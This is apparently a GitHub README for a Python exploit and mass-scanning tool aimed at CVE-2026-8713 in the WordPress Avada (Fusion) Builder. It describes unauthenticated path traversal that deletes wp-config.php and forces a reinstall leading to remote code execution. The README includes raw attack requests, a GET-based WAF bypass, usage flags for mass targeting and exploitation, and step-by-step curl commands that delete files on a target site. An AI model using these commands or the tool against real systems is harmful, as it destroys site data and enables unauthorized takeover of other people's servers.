shinthink/CVE-2026-8713

GitHub: shinthink/CVE-2026-8713

针对 WordPress Avada Builder 未授权路径遍历导致任意文件删除并升级为 RCE 的漏洞利用与批量检测工具。

Stars: 4 | Forks: 0

CVE-2026-8713 — Avada (Fusion) Builder WordPress Exploit

未授权路径遍历 → 任意文件删除 → 强制重装 → RCE

## 概述 **CVE-2026-8713** 是 WordPress 的 **Avada (Fusion) Builder** 插件/主题中一个 CVSS 9.1 严重漏洞。`Fusion_Form_DB_Entries` 类中的 `maybe_delete_files()` 函数通过简单的字符串替换,利用由攻击者控制的表单条目值来构建文件系统路径,并且没有进行 `realpath()` 验证或目录包含检查。 未经身份验证的攻击者通过 `fusion_form_submit_ajax` handler 提交路径遍历 payload。当 `Fusion_Form_DB_Privacy` 的 shutdown hook 处理带有 `privacy_expiration_action=delete` 的条目时,目标文件就会从服务器上被删除。 ### 受影响版本 | Version | Status | |---|---| | Fusion Builder ≤ 3.15.3 | 存在漏洞 | | Fusion Builder ≥ 3.15.4 | 已修复 | | Avada theme (all) | 内置插件可能存在漏洞 | ## 漏洞机制 ### 根本原因 在 `fusion-builder/inc/class-fusion-form-db-entries.php` 中,`maybe_delete_files()` 方法使用字符串替换来解析文件路径,且没有进行包含验证: ``` $file_path = str_replace($upload['url'], $upload['path'], $value); // No realpath() check — path traversal sequences pass through unlink($file_path); ``` ### 攻击链 ``` 1. Attacker submits Avada form via wp_ajax_nopriv_fusion_form_submit_ajax → Path traversal: ../../wp-config.php → privacy_expiration_action = delete → privacy_expiration_interval = 0 2. WordPress shutdown hook fires Fusion_Form_DB_Privacy → Processes stored form entry → Calls maybe_delete_files() on attacker-controlled path → wp-config.php deleted 3. WordPress enters setup/install mode → Attacker connects site to malicious database → Full remote code execution ``` ### 未授权访问 AJAX handler 使用 `wp_ajax_nopriv_` 注册,使得未经身份验证的用户也可以访问它: ``` POST /wp-admin/admin-ajax.php action=fusion_form_submit_ajax form_id= privacy_expiration_action=delete fusion_privacy_expiration_interval=0 fusion_form_field_=../../wp-config.php ``` ### WAF Bypass 许多主机屏蔽了发往 `/wp-admin/admin-ajax.php` 的 POST 请求。WordPress 在此 endpoint 上接受通过 GET 传递的参数,从而提供了一个简单的绕过方法: ``` GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=&privacy_expiration_action=delete&... ``` ## 安装 ``` git clone https://github.com/shinthink/CVE-2026-8713.git cd CVE-2026-8713 pip install -r requirements.txt ``` ## 使用说明 ``` # 仅检测(默认 — 不删除文件) python cve_2026_8713.py -t target.com # Mass detection python cve_2026_8713.py -f targets.txt # Exploit 模式 — 删除 wp-config.php python cve_2026_8713.py -t target.com --exploit # 删除自定义文件 python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log" ``` ### 参数 ``` -t, --target Single target (domain or IP) -f, --file Target list, one per line --exploit Enable file deletion (default: detection only) --delete PATH Custom file path to delete (default: wp-config.php) -o, --output Save results to file --threads Workers (default: 20) -v, --verbose Show detailed output ``` ## 概念验证 ### 检测模式 ``` $ python cve_2026_8713.py -f targets.txt ``` ``` CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1 Mode: Detection | Targets: 521 | Workers: 20 ─────────────────────────────────────────────────────── [EXPLOIT] target-vuln.com 1.2s form #3 (AJAX open) [VULN] target-waf.com 2.1s form #1 (WAF blocked) [AVADA] target-noform.com 0.5s (no form found) [-] target-noavada.com 0.3s ─────────────────────────────────────────────────────── Scan complete | Time: 45s ─────────────────────────────────────────────────────── Targets : 521 Avada detected : 47 Forms found : 12 Vulnerable : 9 ``` ### Exploit 模式 ``` $ python cve_2026_8713.py -t target.com --exploit -v ``` ``` CVE-2026-8713 — Avada Builder Exploit CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE [+] Found Avada form: id=3 [+] POST form_id=3: HTTP 403 (WAF blocked) [+] GET form_id=3: HTTP 200 (WAF bypassed) Host : target.com Avada : YES Form : 3 Deleted : wp-config.php (force reinstall → RCE) Time : 3.2s ``` ### 手动利用 **步骤 1 — 验证 Avada** ``` curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5 ``` **步骤 2 — 查找 form ID** ``` curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](\d+)' ``` **步骤 3 — 提交带有路径遍历的表单** ``` curl -sk -X POST \ -d 'action=fusion_form_submit_ajax' \ -d 'form_id=3' \ -d 'privacy_expiration_action=delete' \ -d 'fusion_privacy_expiration_interval=0' \ -d 'fusion_form_field_x=../../wp-config.php' \ 'https://target.com/wp-admin/admin-ajax.php' ``` **步骤 4 — WAF Bypass(如果 POST 被屏蔽)** ``` curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php' ``` **步骤 5 — 验证并利用 RCE** ``` # 站点处于安装模式? curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php' # HTTP 200 → wp-config 已删除 → 连接恶意 DB → 完全 RCE ``` ## 免责声明 ## 参考资源 | Resource | Link | |---|---| | IONIX Advisory | [ionix.io/threat-center/cve-2026-8713](https://www.ionix.io/threat-center/cve-2026-8713/) | | Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder/avada-fusion-builder-3153-unauthenticated-arbitrary-file-deletion) | | Patchstack | [patchstack.com](https://patchstack.com/database/wordpress/plugin/fusion-builder/) | | NVD Entry | [CVE-2026-8713](https://nvd.nist.gov/vuln/detail/CVE-2026-8713) |

本项目与 ThemeFusion 或 Avada 无关。

标签:CISA项目, Python, RCE, Web安全, WordPress, 安全, 无后门, 无服务器架构, 网络信息收集, 蓝队分析, 超时处理, 逆向工具